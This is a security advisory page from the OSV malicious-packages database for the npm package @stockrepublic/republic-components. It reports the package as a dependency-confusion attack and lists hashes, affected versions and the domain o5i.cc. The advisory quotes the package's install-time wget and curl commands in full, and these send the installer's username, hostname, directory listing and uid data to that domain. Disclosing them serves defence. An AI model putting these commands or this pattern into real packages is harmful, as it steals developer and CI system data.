MAL-2026-4289

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@stockrepublic/republic-components/MAL-2026-4289.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4289
Published
2026-05-24T19:40:37Z
Modified
2026-05-26T06:02:03.562316798Z
Summary
Malicious code in @stockrepublic/republic-components (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a)

The package masquerades as an internal @stockrepublic component (version 99.0.0, description 'Runs git diff and saves the output to git.log on install') but performs no git operation. Two independent install-time exfiltration paths fire on npm install:

  1. package.json preinstall runs wget --quiet "http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)", leaking the installer's username, working directory, and hostname over plain HTTP to o5i.cc.
  2. package.json install runs node index.js, which at index.js line 11 invokes execSync("id > log.txt; ls -la >> log.txt; hostname >> log.txt; curl -X POST -F file=@log.txt https://o5i.cc/supp; curl -X POST -d \"$(id)\" https://o5i.cc/supp"), exfiltrating uid/gid output and a directory listing of the consumer's project.

The inflated 99.0.0 version in a scoped namespace, combined with a cover-story description that does not match the code, is the canonical dependency-confusion pattern targeting an organization's private @stockrepublic registry. Any developer or CI system that pulls this public package by mistake leaks identity and filesystem metadata to attacker infrastructure.

Source: ossf-package-analysis (f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c)

The OpenSSF Package Analysis project identified '@stockrepublic/republic-components' @ 99.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
Database specific
{
    "malicious-packages-origins": [
        {
            "source": "ossf-package-analysis",
            "sha256": "f5dd919316a540368ded0f9b3b7dc25a4f937373069ad4dfe1262c3b48f2949c",
            "modified_time": "2026-05-24T19:53:13Z",
            "import_time": "2026-05-24T21:49:24.852151634Z",
            "versions": [
                "99.0.0"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "300b309644b646817c47a283d8b9aaa018e8ae0f59986207f55fd0c39dca872a",
            "modified_time": "2026-05-24T19:40:37Z",
            "import_time": "2026-05-26T05:52:48.062718972Z",
            "id": "IN-MAL-2026-004539",
            "versions": [
                "99.0.0"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "cccc2f3457a8267127a9715173a83640bd4e301797fc5d4e0345f91bf924e4ac",
            "modified_time": "2026-05-24T19:57:36Z",
            "import_time": "2026-05-26T05:52:48.178141461Z",
            "id": "IN-MAL-2026-004540",
            "versions": [
                "100.0.0"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "eea914c1229cc6bbc788730857e871dae1f161a0b0e1dece234e336252bd1155",
            "modified_time": "2026-05-24T19:57:36Z",
            "import_time": "2026-05-26T05:52:48.269952239Z",
            "id": "IN-MAL-2026-004541",
            "versions": [
                "100.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @stockrepublic/republic-components

Package

Name
@stockrepublic/republic-components
View open source insights on deps.dev
Purl
pkg:npm/%40stockrepublic%2Frepublic-components

Affected ranges

Affected versions

99.*
99.0.0
100.*
100.0.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@stockrepublic/republic-components/MAL-2026-4289.json"
indicators
{
    "domains": [
        "o5i.cc"
    ],
    "package_integrity": [
        {
            "filename": "republic-components-99.0.0.tgz",
            "hashes": {
                "sha1": "5b1da5c3606e5c6712cb29883dd2008c5ff189f2",
                "sha512_sri": "sha512-nDALP/7uK3Cx3uvvjUctJ+v7U/YHJQiNveN4jUhcMO59usO3f+dY0F5AsRZR1LG4v98ayKebrGIE2iEO/FBMgw=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "03f0a2f89a32df232dc11f7134f18147f481bae75455ac28ddb76904c3ce881247a759",
            "sha256": "d02146874e017458cfdec8f2cf0752a2e84853c9c64e8edd791b49349a069893"
        },
        {
            "path": "index.js",
            "tlsh": "cb0152a3435d977492e20cd47a6f602fbd8bf3963106f9b04a7c48698bc285c40630e6",
            "sha256": "dc4af3b8f0aa13c77049bdbb6d7144fd115355d874c5788e5a5d7dc035167d89"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]